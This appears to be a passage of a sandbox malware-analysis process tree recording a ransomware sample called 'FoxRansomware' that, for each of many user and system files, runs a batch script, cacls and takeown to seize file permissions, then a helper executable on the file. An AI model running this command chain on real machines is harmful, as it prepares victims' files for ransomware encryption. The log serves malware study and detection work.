  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin""
  2⤵
  PID:3880
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin" /E /G Admin:F /C
    3⤵
    PID:3732
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin"
    3⤵
    PID:6512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000006P.bin" -nobanner
    3⤵
    PID:8212
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000006P.bin" -nobanner
      4⤵
      PID:5416
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin""
  2⤵
  PID:8228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin" /E /G Admin:F /C
    3⤵
    PID:8320
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin"
    3⤵
    PID:6656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000073.bin" -nobanner
    3⤵
    PID:6368
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000073.bin" -nobanner
      4⤵
      PID:8256
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin""
  2⤵
  PID:8540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin" /E /G Admin:F /C
    3⤵
    PID:8676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin"
    3⤵
    - Modifies file permissions
    PID:8776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "00000081.bin" -nobanner
    3⤵
    PID:8520
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "00000081.bin" -nobanner
      4⤵
      PID:8280
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009D.bin""
  2⤵
  PID:9012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009D.bin" /E /G Admin:F /C
    3⤵
    PID:8892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009D.bin"
    3⤵
    PID:9004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "0000009D.bin" -nobanner
    3⤵
    PID:8576
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "0000009D.bin" -nobanner
      4⤵
      PID:6792
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AJ.bin""
  2⤵
  PID:8788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AJ.bin" /E /G Admin:F /C
    3⤵
    PID:8780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AJ.bin"
    3⤵
    PID:8708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "000000AJ.bin" -nobanner
    3⤵
    PID:9016
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "000000AJ.bin" -nobanner
      4⤵
      PID:8772
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8644
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AV.bin""
  2⤵
  PID:9052
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AV.bin" /E /G Admin:F /C
    3⤵
    PID:8292
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AV.bin"
    3⤵
    PID:8704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "000000AV.bin" -nobanner
    3⤵
    PID:8004
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "000000AV.bin" -nobanner
      4⤵
      PID:3264
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7472
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:8976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:6600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    - Modifies file permissions
    PID:8344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:8964
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:3560
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4220
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa""
  2⤵
  PID:4784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa"
    3⤵
    PID:8364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:4244
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "classes.jsa" -nobanner
      4⤵
      PID:8340
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6576
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:8356
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:1440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    PID:6572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:2960
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:6256
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  2⤵
  PID:1800
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
    3⤵
    - Modifies file permissions
    PID:5404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:6828
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:7988
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7872
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml""
  2⤵
  PID:7152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml" /E /G Admin:F /C
    3⤵
    PID:6940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\uk-UA\resource.xml"
    3⤵
    PID:6844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:6988
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:2148
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1060
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""
  2⤵
  PID:3360
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"
    3⤵
    - Modifies file permissions
    PID:6096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "DesktopSettings2013.xml" -nobanner
    3⤵
    PID:4648
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "DesktopSettings2013.xml" -nobanner
      4⤵
      PID:5196
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""
  2⤵
  PID:2744
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C
    3⤵
    PID:7692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"
    3⤵
    PID:7096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
    3⤵
    PID:8148
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
      4⤵
      PID:8128
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""
  2⤵
  PID:8112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"
    3⤵
    PID:7604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
    3⤵
    PID:7584
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
      4⤵
      PID:7792
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml""
  2⤵
  PID:5912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C
    3⤵
    PID:6072
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml"
    3⤵
    - Modifies file permissions
    PID:6060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "VdiState.xml" -nobanner
    3⤵
    PID:7752
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "VdiState.xml" -nobanner
      4⤵
      PID:8008
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp""
  2⤵
  PID:5916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp" /E /G Admin:F /C
    3⤵
    PID:5504
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901020069.msp"
    3⤵
    PID:5444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "AcroRdrDCUpd1901020069.msp" -nobanner
    3⤵
    PID:7784
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "AcroRdrDCUpd1901020069.msp" -nobanner
      4⤵
      PID:8724
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4736
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:7296
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:540
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    PID:760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "device.png" -nobanner
    3⤵
    PID:5316
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "device.png" -nobanner
      4⤵
      PID:8104
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  2⤵
  PID:5332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:7248
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    3⤵
    PID:3492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4136
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4120
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5192
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  2⤵
  PID:7316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:5172
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    3⤵
    PID:6044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3172
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:6872
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""
  2⤵
  PID:4024
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C
    3⤵
    PID:5992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"
    3⤵
    - Modifies file permissions
    PID:5364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
    3⤵
    PID:4868
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
      4⤵
      PID:5436
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5184
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml""
  2⤵
  PID:3176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C
    3⤵
    PID:7820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"
    3⤵
    PID:7212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner
    3⤵
    PID:2044
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner
      4⤵
      PID:7268
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml""
  2⤵
  PID:6020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C
    3⤵
    PID:2340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"
    3⤵
    - Modifies file permissions
    PID:6980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "RoamingCredentialSettings.xml" -nobanner
    3⤵
    PID:9092
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "RoamingCredentialSettings.xml" -nobanner
      4⤵
      PID:5484
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9100
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:6188
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:5532
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    - Modifies file permissions
    PID:6424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "device.png" -nobanner
    3⤵
    PID:6684
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "device.png" -nobanner
      4⤵
      PID:1216
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  2⤵
  PID:6468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:8880
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    3⤵
    - Modifies file permissions
    PID:5572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:8884
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:8836
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  2⤵
  PID:9124
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:8832
- - C:\Windows\SysWOW64\takeown.exe
